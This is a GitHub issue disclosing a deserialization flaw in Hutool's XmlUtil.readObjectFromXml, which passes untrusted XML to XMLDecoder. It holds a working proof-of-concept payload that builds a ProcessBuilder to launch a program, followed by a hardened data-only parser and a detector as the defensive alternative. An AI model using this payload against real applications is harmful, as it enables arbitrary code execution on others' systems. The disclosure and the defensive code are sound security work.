
XmlUtil Deserialization vulnerability #2855

Closed
S2eTo opened this issue Jan 13, 2023 · 1 comment
S2eTo commented Jan 13, 2023

Desc

Hutool provides XML utility classes that may be vulnerable to remote code execution when XmlUtil.readObjectFromXml is used to interpret untrusted XML strings.

Detailed

The program calls XMLDecoder.readObject to parse the XML string, causing a deserialization vulnerability.

cn.hutool.core.util.XmlUtil#readObjectFromXml

Attack

```java
XmlUtil.readObjectFromXml("<java>\n" +
        "    <object class=\"java.lang.ProcessBuilder\">\n" +
        "        <array class=\"java.lang.String\" length=\"1\">\n" +
        "            <void index=\"0\">\n" +
        "                <string>calc</string>\n" +
        "            </void>\n" +
        "        </array>\n" +
        "        <void method=\"start\"></void>\n" +
        "    </object>\n" +
        "</java>\n");
```
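The root cause described above is that XMLDecoder treats the document as a script of constructor and method calls, so any class name the input names gets instantiated. The defensive replacement is to stop using XMLDecoder for untrusted input and instead parse the XML as plain data, copying only expected fields into a fixed application type. The following is an added example written for this issue; it is neither Hutool's code nor the reporter's. The `Settings` record, the `<settings>` document shape, and the `SafeXmlReader` class are assumptions made for the example (it needs Java 16+ for records).

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

// Hypothetical replacement for XmlUtil.readObjectFromXml: the XML is parsed as
// data with a hardened DOM parser, and only the fields we expect are copied into
// an application type. No class named inside the document is ever resolved.
public final class SafeXmlReader {

    // Example application type (constructed for this example).
    public record Settings(String name, int retries) {}

    private static DocumentBuilder hardenedBuilder() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Forbidding DOCTYPE blocks XXE and entity-expansion attacks in one step.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    // Detection helper: an XMLDecoder document always has <java> as its root.
    // Useful for logging or rejecting such input at an input filter.
    public static boolean isXmlDecoderDocument(String xml) throws Exception {
        Document doc = hardenedBuilder().parse(new InputSource(new StringReader(xml)));
        return "java".equals(doc.getDocumentElement().getTagName());
    }

    public static Settings readSettings(String xml) throws Exception {
        Document doc = hardenedBuilder().parse(new InputSource(new StringReader(xml)));
        Element root = doc.getDocumentElement();
        // Only the expected root is accepted; everything else is rejected up front.
        if (!"settings".equals(root.getTagName())) {
            throw new IllegalArgumentException("unexpected root element: " + root.getTagName());
        }
        String name = requiredChildText(root, "name");
        int retries = Integer.parseInt(requiredChildText(root, "retries"));
        if (retries < 0 || retries > 10) {
            throw new IllegalArgumentException("retries out of range: " + retries);
        }
        return new Settings(name, retries);
    }

    private static String requiredChildText(Element parent, String tag) {
        NodeList nodes = parent.getElementsByTagName(tag);
        if (nodes.getLength() != 1) {
            throw new IllegalArgumentException("expected exactly one <" + tag + ">");
        }
        return nodes.item(0).getTextContent().trim();
    }

    public static void main(String[] args) throws Exception {
        // Constructed benign input: parsed into a Settings value.
        System.out.println(readSettings(
                "<settings><name>svc</name><retries>3</retries></settings>"));

        // Constructed input with the shape of an XMLDecoder document (class name
        // replaced by a placeholder): flagged by the detector and rejected by the
        // reader before any class could be resolved.
        String decoderShaped = "<java><object class=\"PLACEHOLDER\"/></java>";
        System.out.println("looks like XMLDecoder input: " + isXmlDecoderDocument(decoderShaped));
        try {
            readSettings(decoderShaped);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The design point is that safety comes from the reader deciding which type to build, not from filtering class names out of the input: XMLDecoder can reference classes through several element forms, so an allowlist applied to the document is fragile, whereas a data-only parse never hands control of instantiation to the input at all.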

@S2eTo S2eTo changed the title XmlUtil deserialization vulnerability XmlUtil Deserialization vulnerability Jan 13, 2023
looly commented Jan 15, 2023

@looly looly closed this as completed Jan 15, 2023
@looly looly added the question label Jan 15, 2023